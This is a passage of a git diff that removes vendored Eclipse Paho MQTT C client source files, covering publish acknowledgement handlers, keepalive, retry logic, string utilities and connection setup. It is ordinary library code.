- * List callback function for comparing Message structures by message id
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int messageIDCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->msgid == *(int*)b;
-}
-
-
-/**
- * Assign a new message id for a client.  Make sure it isn't already being used and does
- * not exceed the maximum.
- * @param client a client structure
- * @return the next message id to use, or 0 if none available
- */
-int MQTTProtocol_assignMsgId(Clients* client)
-{
-	int start_msgid = client->msgID;
-	int msgid = start_msgid;
-
-	FUNC_ENTRY;
-	msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-	while (ListFindItem(client->outboundMsgs, &msgid, messageIDCompare) != NULL)
-	{
-		msgid = (msgid == MAX_MSG_ID) ? 1 : msgid + 1;
-		if (msgid == start_msgid) 
-		{ /* we've tried them all - none free */
-			msgid = 0;
-			break;
-		}
-	}
-	if (msgid != 0)
-		client->msgID = msgid;
-	FUNC_EXIT_RC(msgid);
-	return msgid;
-}
-
-
-static void MQTTProtocol_storeQoS0(Clients* pubclient, Publish* publish)
-{
-	int len;
-	pending_write* pw = NULL;
-
-	FUNC_ENTRY;
-	/* store the publication until the write is finished */
-	pw = malloc(sizeof(pending_write));
-	Log(TRACE_MIN, 12, NULL);
-	pw->p = MQTTProtocol_storePublication(publish, &len);
-	pw->socket = pubclient->net.socket;
-	ListAppend(&(state.pending_writes), pw, sizeof(pending_write)+len);
-	/* we don't copy QoS 0 messages unless we have to, so now we have to tell the socket buffer where
-	the saved copy is */
-	if (SocketBuffer_updateWrite(pw->socket, pw->p->topic, pw->p->payload) == NULL)
-		Log(LOG_SEVERE, 0, "Error updating write");
-	FUNC_EXIT;
-}
-
-
-/**
- * Utility function to start a new publish exchange.
- * @param pubclient the client to send the publication to
- * @param publish the publication data
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @return the completion code
- */
-static int MQTTProtocol_startPublishCommon(Clients* pubclient, Publish* publish, int qos, int retained)
-{
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_publish(publish, 0, qos, retained, &pubclient->net, pubclient->clientID);
-	if (qos == 0 && rc == TCPSOCKET_INTERRUPTED)
-		MQTTProtocol_storeQoS0(pubclient, publish);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Start a new publish exchange.  Store any state necessary and try to send the packet
- * @param pubclient the client to send the publication to
- * @param publish the publication data
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @param mm - pointer to the message to send
- * @return the completion code
- */
-int MQTTProtocol_startPublish(Clients* pubclient, Publish* publish, int qos, int retained, Messages** mm)
-{
-	Publish p = *publish;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (qos > 0)
-	{
-		*mm = MQTTProtocol_createMessage(publish, mm, qos, retained);
-		ListAppend(pubclient->outboundMsgs, *mm, (*mm)->len);
-		/* we change these pointers to the saved message location just in case the packet could not be written
-		entirely; the socket buffer will use these locations to finish writing the packet */
-		p.payload = (*mm)->publish->payload;
-		p.topic = (*mm)->publish->topic;
-	}
-	rc = MQTTProtocol_startPublishCommon(pubclient, &p, qos, retained);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Copy and store message data for retries
- * @param publish the publication data
- * @param mm - pointer to the message data to store
- * @param qos the MQTT QoS to use
- * @param retained boolean - whether to set the MQTT retained flag
- * @return pointer to the message data stored
- */
-Messages* MQTTProtocol_createMessage(Publish* publish, Messages **mm, int qos, int retained)
-{
-	Messages* m = malloc(sizeof(Messages));
-
-	FUNC_ENTRY;
-	m->len = sizeof(Messages);
-	if (*mm == NULL || (*mm)->publish == NULL)
-	{
-		int len1;
-		*mm = m;
-		m->publish = MQTTProtocol_storePublication(publish, &len1);
-		m->len += len1;
-	}
-	else
-	{
-		++(((*mm)->publish)->refcount);
-		m->publish = (*mm)->publish;
-	}
-	m->msgid = publish->msgId;
-	m->qos = qos;
-	m->retain = retained;
-	time(&(m->lastTouch));
-	if (qos == 2)
-		m->nextMessageType = PUBREC;
-	FUNC_EXIT;
-	return m;
-}
-
-
-/**
- * Store message data for possible retry
- * @param publish the publication data
- * @param len returned length of the data stored
- * @return the publication stored
- */
-Publications* MQTTProtocol_storePublication(Publish* publish, int* len)
-{
-	Publications* p = malloc(sizeof(Publications));
-
-	FUNC_ENTRY;
-	p->refcount = 1;
-
-	*len = (int)strlen(publish->topic)+1;
-	if (Heap_findItem(publish->topic))
-		p->topic = publish->topic;
-	else
-	{
-		p->topic = malloc(*len);
-		strcpy(p->topic, publish->topic);
-	}
-	*len += sizeof(Publications);
-
-	p->topiclen = publish->topiclen;
-	p->payloadlen = publish->payloadlen;
-	p->payload = malloc(publish->payloadlen);
-	memcpy(p->payload, publish->payload, p->payloadlen);
-	*len += publish->payloadlen;
-
-	ListAppend(&(state.publications), p, *len);
-	FUNC_EXIT;
-	return p;
-}
-
-/**
- * Remove stored message data.  Opposite of storePublication
- * @param p stored publication to remove
- */
-void MQTTProtocol_removePublication(Publications* p)
-{
-	FUNC_ENTRY;
-	if (--(p->refcount) == 0)
-	{
-		free(p->payload);
-		free(p->topic);
-		ListRemove(&(state.publications), p);
-	}
-	FUNC_EXIT;
-}
-
-/**
- * Process an incoming publish packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePublishes(void* pack, int sock)
-{
-	Publish* publish = (Publish*)pack;
-	Clients* client = NULL;
-	char* clientid = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	clientid = client->clientID;
-	Log(LOG_PROTOCOL, 11, NULL, sock, clientid, publish->msgId, publish->header.bits.qos,
-					publish->header.bits.retain, min(20, publish->payloadlen), publish->payload);
-
-	if (publish->header.bits.qos == 0)
-		Protocol_processPublication(publish, client);
-	else if (publish->header.bits.qos == 1)
-	{
-		/* send puback before processing the publications because a lot of return publications could fill up the socket buffer */
-		rc = MQTTPacket_send_puback(publish->msgId, &client->net, client->clientID);
-		/* if we get a socket error from sending the puback, should we ignore the publication? */
-		Protocol_processPublication(publish, client);
-	}
-	else if (publish->header.bits.qos == 2)
-	{
-		/* store publication in inbound list */
-		int len;
-		ListElement* listElem = NULL;
-		Messages* m = malloc(sizeof(Messages));
-		Publications* p = MQTTProtocol_storePublication(publish, &len);
-		m->publish = p;
-		m->msgid = publish->msgId;
-		m->qos = publish->header.bits.qos;
-		m->retain = publish->header.bits.retain;
-		m->nextMessageType = PUBREL;
-		if ( ( listElem = ListFindItem(client->inboundMsgs, &(m->msgid), messageIDCompare) ) != NULL )
-		{   /* discard queued publication with same msgID that the current incoming message */
-			Messages* msg = (Messages*)(listElem->content);
-			MQTTProtocol_removePublication(msg->publish);
-			ListInsert(client->inboundMsgs, m, sizeof(Messages) + len, listElem);
-			ListRemove(client->inboundMsgs, msg);
-		} else
-			ListAppend(client->inboundMsgs, m, sizeof(Messages) + len);
-		rc = MQTTPacket_send_pubrec(publish->msgId, &client->net, client->clientID);
-		publish->topic = NULL;
-	}
-	MQTTPacket_freePublish(publish);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Process an incoming puback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubacks(void* pack, int sock)
-{
-	Puback* puback = (Puback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 14, NULL, sock, client->clientID, puback->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	if (ListFindItem(client->outboundMsgs, &(puback->msgId), messageIDCompare) == NULL)
-		Log(TRACE_MIN, 3, NULL, "PUBACK", client->clientID, puback->msgId);
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 1)
-			Log(TRACE_MIN, 4, NULL, "PUBACK", client->clientID, puback->msgId, m->qos);
-		else
-		{
-			Log(TRACE_MIN, 6, NULL, "PUBACK", client->clientID, puback->msgId);
-			#if !defined(NO_PERSISTENCE)
-				rc = MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_SENT, m->qos, puback->msgId);
-			#endif
-			MQTTProtocol_removePublication(m->publish);
-			ListRemove(client->outboundMsgs, m);
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubrec packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubrecs(void* pack, int sock)
-{
-	Pubrec* pubrec = (Pubrec*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 15, NULL, sock, client->clientID, pubrec->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	client->outboundMsgs->current = NULL;
-	if (ListFindItem(client->outboundMsgs, &(pubrec->msgId), messageIDCompare) == NULL)
-	{
-		if (pubrec->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBREC", client->clientID, pubrec->msgId);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 2)
-		{
-			if (pubrec->header.bits.dup == 0)
-				Log(TRACE_MIN, 4, NULL, "PUBREC", client->clientID, pubrec->msgId, m->qos);
-		}
-		else if (m->nextMessageType != PUBREC)
-		{
-			if (pubrec->header.bits.dup == 0)
-				Log(TRACE_MIN, 5, NULL, "PUBREC", client->clientID, pubrec->msgId);
-		}
-		else
-		{
-			rc = MQTTPacket_send_pubrel(pubrec->msgId, 0, &client->net, client->clientID);
-			m->nextMessageType = PUBCOMP;
-			time(&(m->lastTouch));
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubrel packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubrels(void* pack, int sock)
-{
-	Pubrel* pubrel = (Pubrel*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 17, NULL, sock, client->clientID, pubrel->msgId);
-
-	/* look for the message by message id in the records of inbound messages for this client */
-	if (ListFindItem(client->inboundMsgs, &(pubrel->msgId), messageIDCompare) == NULL)
-	{
-		if (pubrel->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBREL", client->clientID, pubrel->msgId);
-		else
-			/* Apparently this is "normal" behaviour, so we don't need to issue a warning */
-			rc = MQTTPacket_send_pubcomp(pubrel->msgId, &client->net, client->clientID);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->inboundMsgs->current->content);
-		if (m->qos != 2)
-			Log(TRACE_MIN, 4, NULL, "PUBREL", client->clientID, pubrel->msgId, m->qos);
-		else if (m->nextMessageType != PUBREL)
-			Log(TRACE_MIN, 5, NULL, "PUBREL", client->clientID, pubrel->msgId);
-		else
-		{
-			Publish publish;
-
-			/* send pubcomp before processing the publications because a lot of return publications could fill up the socket buffer */
-			rc = MQTTPacket_send_pubcomp(pubrel->msgId, &client->net, client->clientID);
-			publish.header.bits.qos = m->qos;
-			publish.header.bits.retain = m->retain;
-			publish.msgId = m->msgid;
-			publish.topic = m->publish->topic;
-			publish.topiclen = m->publish->topiclen;
-			publish.payload = m->publish->payload;
-			publish.payloadlen = m->publish->payloadlen;
-			Protocol_processPublication(&publish, client);
-			#if !defined(NO_PERSISTENCE)
-				rc += MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_RECEIVED, m->qos, pubrel->msgId);
-			#endif
-			ListRemove(&(state.publications), m->publish);
-			ListRemove(client->inboundMsgs, m);
-			++(state.msgs_received);
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pubcomp packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePubcomps(void* pack, int sock)
-{
-	Pubcomp* pubcomp = (Pubcomp*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 19, NULL, sock, client->clientID, pubcomp->msgId);
-
-	/* look for the message by message id in the records of outbound messages for this client */
-	if (ListFindItem(client->outboundMsgs, &(pubcomp->msgId), messageIDCompare) == NULL)
-	{
-		if (pubcomp->header.bits.dup == 0)
-			Log(TRACE_MIN, 3, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-	}
-	else
-	{
-		Messages* m = (Messages*)(client->outboundMsgs->current->content);
-		if (m->qos != 2)
-			Log(TRACE_MIN, 4, NULL, "PUBCOMP", client->clientID, pubcomp->msgId, m->qos);
-		else
-		{
-			if (m->nextMessageType != PUBCOMP)
-				Log(TRACE_MIN, 5, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-			else
-			{
-				Log(TRACE_MIN, 6, NULL, "PUBCOMP", client->clientID, pubcomp->msgId);
-				#if !defined(NO_PERSISTENCE)
-					rc = MQTTPersistence_remove(client, PERSISTENCE_PUBLISH_SENT, m->qos, pubcomp->msgId);
-				#endif
-				MQTTProtocol_removePublication(m->publish);
-				ListRemove(client->outboundMsgs, m);
-				(++state.msgs_sent);
-			}
-		}
-	}
-	free(pack);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT protocol keepAlive processing.  Sends PINGREQ packets as required.
- * @param now current time
- */
-void MQTTProtocol_keepalive(time_t now)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	ListNextElement(bstate->clients, &current);
-	while (current)
-	{
-		Clients* client =	(Clients*)(current->content);
-		ListNextElement(bstate->clients, &current); 
-		if (client->connected && client->keepAliveInterval > 0 &&
-			(difftime(now, client->net.lastSent) >= client->keepAliveInterval ||
-					difftime(now, client->net.lastReceived) >= client->keepAliveInterval))
-		{
-			if (client->ping_outstanding == 0)
-			{
-				if (Socket_noPendingWrites(client->net.socket))
-				{
-					if (MQTTPacket_send_pingreq(&client->net, client->clientID) != TCPSOCKET_COMPLETE)
-					{
-						Log(TRACE_PROTOCOL, -1, "Error sending PINGREQ for client %s on socket %d, disconnecting", client->clientID, client->net.socket);
-						MQTTProtocol_closeSession(client, 1);
-					}
-					else
-					{
-						client->net.lastSent = now;
-						client->ping_outstanding = 1;
-					}
-				}
-			}
-			else
-			{
-				Log(TRACE_PROTOCOL, -1, "PINGRESP not received in keepalive interval for client %s on socket %d, disconnecting", client->clientID, client->net.socket);
-				MQTTProtocol_closeSession(client, 1);
-			}
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * MQTT retry processing per client
- * @param now current time
- * @param client - the client to which to apply the retry processing
- * @param regardless boolean - retry packets regardless of retry interval (used on reconnect)
- */
-static void MQTTProtocol_retries(time_t now, Clients* client, int regardless)
-{
-	ListElement* outcurrent = NULL;
-
-	FUNC_ENTRY;
-
-	if (!regardless && client->retryInterval <= 0) /* 0 or -ive retryInterval turns off retry except on reconnect */
-		goto exit;
-
-	while (client && ListNextElement(client->outboundMsgs, &outcurrent) &&
-		   client->connected && client->good &&        /* client is connected and has no errors */
-		   Socket_noPendingWrites(client->net.socket)) /* there aren't any previous packets still stacked up on the socket */
-	{
-		Messages* m = (Messages*)(outcurrent->content);
-		if (regardless || difftime(now, m->lastTouch) > max(client->retryInterval, 10))
-		{
-			if (m->qos == 1 || (m->qos == 2 && m->nextMessageType == PUBREC))
-			{
-				Publish publish;
-				int rc;
-
-				Log(TRACE_MIN, 7, NULL, "PUBLISH", client->clientID, client->net.socket, m->msgid);
-				publish.msgId = m->msgid;
-				publish.topic = m->publish->topic;
-				publish.payload = m->publish->payload;
-				publish.payloadlen = m->publish->payloadlen;
-				rc = MQTTPacket_send_publish(&publish, 1, m->qos, m->retain, &client->net, client->clientID);
-				if (rc == SOCKET_ERROR)
-				{
-					client->good = 0;
-					Log(TRACE_PROTOCOL, 29, NULL, client->clientID, client->net.socket,
-												Socket_getpeer(client->net.socket));
-					MQTTProtocol_closeSession(client, 1);
-					client = NULL;
-				}
-				else
-				{
-					if (m->qos == 0 && rc == TCPSOCKET_INTERRUPTED)
-						MQTTProtocol_storeQoS0(client, &publish);
-					time(&(m->lastTouch));
-				}
-			}
-			else if (m->qos && m->nextMessageType == PUBCOMP)
-			{
-				Log(TRACE_MIN, 7, NULL, "PUBREL", client->clientID, client->net.socket, m->msgid);
-				if (MQTTPacket_send_pubrel(m->msgid, 0, &client->net, client->clientID) != TCPSOCKET_COMPLETE)
-				{
-					client->good = 0;
-					Log(TRACE_PROTOCOL, 29, NULL, client->clientID, client->net.socket,
-							Socket_getpeer(client->net.socket));
-					MQTTProtocol_closeSession(client, 1);
-					client = NULL;
-				}
-				else
-					time(&(m->lastTouch));
-			}
-			/* break; why not do all retries at once? */
-		}
-	}
-exit:
-	FUNC_EXIT;
-}
-
-
-/**
- * MQTT retry protocol and socket pending writes processing.
- * @param now current time
- * @param doRetry boolean - retries as well as pending writes?
- * @param regardless boolean - retry packets regardless of retry interval (used on reconnect)
- */
-void MQTTProtocol_retry(time_t now, int doRetry, int regardless)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	ListNextElement(bstate->clients, &current);
-	/* look through the outbound message list of each client, checking to see if a retry is necessary */
-	while (current)
-	{
-		Clients* client = (Clients*)(current->content);
-		ListNextElement(bstate->clients, &current);
-		if (client->connected == 0)
-			continue;
-		if (client->good == 0)
-		{
-			MQTTProtocol_closeSession(client, 1);
-			continue;
-		}
-		if (Socket_noPendingWrites(client->net.socket) == 0)
-			continue;
-		if (doRetry)
-			MQTTProtocol_retries(now, client, regardless);
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * Free a client structure
- * @param client the client data to free
- */
-void MQTTProtocol_freeClient(Clients* client)
-{
-	FUNC_ENTRY;
-	/* free up pending message lists here, and any other allocated data */
-	MQTTProtocol_freeMessageList(client->outboundMsgs);
-	MQTTProtocol_freeMessageList(client->inboundMsgs);
-	ListFree(client->messageQueue);
-	free(client->clientID);
-	if (client->will)
-	{
-		free(client->will->payload);
-		free(client->will->topic);
-		free(client->will);
-	}
-#if defined(OPENSSL)
-	if (client->sslopts)
-	{
-		if (client->sslopts->trustStore)
-			free((void*)client->sslopts->trustStore);
-		if (client->sslopts->keyStore)
-			free((void*)client->sslopts->keyStore);
-		if (client->sslopts->privateKey)
-			free((void*)client->sslopts->privateKey);
-		if (client->sslopts->privateKeyPassword)
-			free((void*)client->sslopts->privateKeyPassword);
-		if (client->sslopts->enabledCipherSuites)
-			free((void*)client->sslopts->enabledCipherSuites);
-		free(client->sslopts);
-	}
-#endif
-	/* don't free the client structure itself... this is done elsewhere */
-	FUNC_EXIT;
-}
-
-
-/**
- * Empty a message list, leaving it able to accept new messages
- * @param msgList the message list to empty
- */
-void MQTTProtocol_emptyMessageList(List* msgList)
-{
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(msgList, &current))
-	{
-		Messages* m = (Messages*)(current->content);
-		MQTTProtocol_removePublication(m->publish);
-	}
-	ListEmpty(msgList);
-	FUNC_EXIT;
-}
-
-
-/**
- * Empty and free up all storage used by a message list
- * @param msgList the message list to empty and free
- */
-void MQTTProtocol_freeMessageList(List* msgList)
-{
-	FUNC_ENTRY;
-	MQTTProtocol_emptyMessageList(msgList);
-	ListFree(msgList);
-	FUNC_EXIT;
-}
-
-
-/**
-* Copy no more than dest_size -1 characters from the string pointed to by src to the array pointed to by dest.
-* The destination string will always be null-terminated.
-* @param dest the array which characters copy to
-* @param src the source string which characters copy from
-* @param dest_size the size of the memory pointed to by dest: copy no more than this -1 (allow for null).  Must be >= 1
-* @return the destination string pointer
-*/
-char* MQTTStrncpy(char *dest, const char *src, size_t dest_size)
-{
-  size_t count = dest_size;
-  char *temp = dest;
-
-  FUNC_ENTRY; 
-  if (dest_size < strlen(src))
-    Log(TRACE_MIN, -1, "the src string is truncated");
-
-  /* We must copy only the first (dest_size - 1) bytes */
-  while (count > 1 && (*temp++ = *src++))
-    count--;
-
-  *temp = '\0';
-
-  FUNC_EXIT;
-  return dest;
-}
-
-
-/**
-* Duplicate a string, safely, allocating space on the heap
-* @param src the source string which characters copy from
-* @return the duplicated, allocated string
-*/
-char* MQTTStrdup(const char* src)
-{
-	size_t mlen = strlen(src) + 1;
-	char* temp = malloc(mlen);
-	MQTTStrncpy(temp, src, mlen);
-	return temp;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h b/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h
deleted file mode 100644
index 36c2dd2..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.h
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 updates
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOLCLIENT_H)
-#define MQTTPROTOCOLCLIENT_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Log.h"
-#include "MQTTProtocol.h"
-#include "Messages.h"
-
-#define MAX_MSG_ID 65535
-#define MAX_CLIENTID_LEN 65535
-
-int MQTTProtocol_startPublish(Clients* pubclient, Publish* publish, int qos, int retained, Messages** m);
-Messages* MQTTProtocol_createMessage(Publish* publish, Messages** mm, int qos, int retained);
-Publications* MQTTProtocol_storePublication(Publish* publish, int* len);
-int messageIDCompare(void* a, void* b);
-int MQTTProtocol_assignMsgId(Clients* client);
-void MQTTProtocol_removePublication(Publications* p);
-void Protocol_processPublication(Publish* publish, Clients* client);
-
-int MQTTProtocol_handlePublishes(void* pack, int sock);
-int MQTTProtocol_handlePubacks(void* pack, int sock);
-int MQTTProtocol_handlePubrecs(void* pack, int sock);
-int MQTTProtocol_handlePubrels(void* pack, int sock);
-int MQTTProtocol_handlePubcomps(void* pack, int sock);
-
-void MQTTProtocol_closeSession(Clients* c, int sendwill);
-void MQTTProtocol_keepalive(time_t);
-void MQTTProtocol_retry(time_t, int, int);
-void MQTTProtocol_freeClient(Clients* client);
-void MQTTProtocol_emptyMessageList(List* msgList);
-void MQTTProtocol_freeMessageList(List* msgList);
-
-char* MQTTStrncpy(char *dest, const char* src, size_t num);
-char* MQTTStrdup(const char* src);
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c b/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c
deleted file mode 100644
index 90d38bf..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolOut.c
+++ /dev/null
@@ -1,242 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for buffer overflow in addressPort bug #433290
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 479376
- *    Ian Craggs - SNI support
- *    Ian Craggs - fix for issue #164
- *    Ian Craggs - fix for issue #179
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions dealing with the MQTT protocol exchanges
- *
- * Some other related functions are in the MQTTProtocolClient module
- */
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "MQTTProtocolOut.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-extern ClientStates* bstate;
-
-
-
-/**
- * Separates an address:port into two separate values
- * @param uri the input string - hostname:port
- * @param port the returned port integer
- * @return the address string
- */
-char* MQTTProtocol_addressPort(const char* uri, int* port)
-{
-	char* colon_pos = strrchr(uri, ':'); /* reverse find to allow for ':' in IPv6 addresses */
-	char* buf = (char*)uri;
-	size_t len;
-
-	FUNC_ENTRY;
-	if (uri[0] == '[')
-	{  /* ip v6 */
-		if (colon_pos < strrchr(uri, ']'))
-			colon_pos = NULL;  /* means it was an IPv6 separator, not for host:port */
-	}
-
-	if (colon_pos) /* have to strip off the port */
-	{
-		size_t addr_len = colon_pos - uri;
-		buf = malloc(addr_len + 1);
-		*port = atoi(colon_pos + 1);
-		MQTTStrncpy(buf, uri, addr_len+1);
-	}
-	else
-		*port = DEFAULT_PORT;
-
-	len = strlen(buf);
-	if (buf[len - 1] == ']')
-	{
-		if (buf == (char*)uri)
-		{
-			buf = malloc(len);  /* we are stripping off the final ], so length is 1 shorter */
-			MQTTStrncpy(buf, uri, len);
-		}
-		else
-			buf[len - 1] = '\0';
-	}
-	FUNC_EXIT;
-	return buf;
-}
-
-
-/**
- * MQTT outgoing connect processing for a client
- * @param ip_address the TCP address:port to connect to
- * @param aClient a structure with all MQTT data needed
- * @param int ssl
- * @param int MQTTVersion the MQTT version to connect with (3 or 4)
- * @return return code
- */
-#if defined(OPENSSL)
-int MQTTProtocol_connect(const char* ip_address, Clients* aClient, int ssl, int MQTTVersion)
-#else
-int MQTTProtocol_connect(const char* ip_address, Clients* aClient, int MQTTVersion)
-#endif
-{
-	int rc, port;
-	char* addr;
-
-	FUNC_ENTRY;
-	aClient->good = 1;
-
-	addr = MQTTProtocol_addressPort(ip_address, &port);
-	rc = Socket_new(addr, port, &(aClient->net.socket));
-	if (rc == EINPROGRESS || rc == EWOULDBLOCK)
-		aClient->connect_state = 1; /* TCP connect called - wait for connect completion */
-	else if (rc == 0)
-	{	/* TCP connect completed. If SSL, send SSL connect */
-#if defined(OPENSSL)
-		if (ssl)
-		{
-			if (SSLSocket_setSocketForSSL(&aClient->net, aClient->sslopts, addr) == 1)
-			{
-				rc = SSLSocket_connect(aClient->net.ssl, aClient->net.socket);
-				if (rc == TCPSOCKET_INTERRUPTED)
-					aClient->connect_state = 2; /* SSL connect called - wait for completion */
-			}
-			else
-				rc = SOCKET_ERROR;
-		}
-#endif
-		
-		if (rc == 0)
-		{
-			/* Now send the MQTT connect packet */
-			if ((rc = MQTTPacket_send_connect(aClient, MQTTVersion)) == 0)
-				aClient->connect_state = 3; /* MQTT Connect sent - wait for CONNACK */ 
-			else
-				aClient->connect_state = 0;
-		}
-	}
-	if (addr != ip_address)
-		free(addr);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming pingresp packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handlePingresps(void* pack, int sock)
-{
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 21, NULL, sock, client->clientID);
-	client->ping_outstanding = 0;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT outgoing subscribe processing for a client
- * @param client the client structure
- * @param topics list of topics
- * @param qoss corresponding list of QoSs
- * @return completion code
- */
-int MQTTProtocol_subscribe(Clients* client, List* topics, List* qoss, int msgID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	/* we should stack this up for retry processing too */
-	rc = MQTTPacket_send_subscribe(topics, qoss, msgID, 0, &client->net, client->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Process an incoming suback packet for a socket
- * @param pack pointer to the publish packet
- * @param sock the socket on which the packet was received
- * @return completion code
- */
-int MQTTProtocol_handleSubacks(void* pack, int sock)
-{
-	Suback* suback = (Suback*)pack;
-	Clients* client = NULL;
-	int rc = TCPSOCKET_COMPLETE;
-
-	FUNC_ENTRY;
-	client = (Clients*)(ListFindItem(bstate->clients, &sock, clientSocketCompare)->content);
-	Log(LOG_PROTOCOL, 23, NULL, sock, client->clientID, suback->msgId);
-	MQTTPacket_freeSuback(suback);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * MQTT outgoing unsubscribe processing for a client
- * @param client the client structure
- * @param topics list of topics
- * @return completion code
- */
-int MQTTProtocol_unsubscribe(Clients* client, List* topics, int msgID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	/* we should stack this up for retry processing too? */
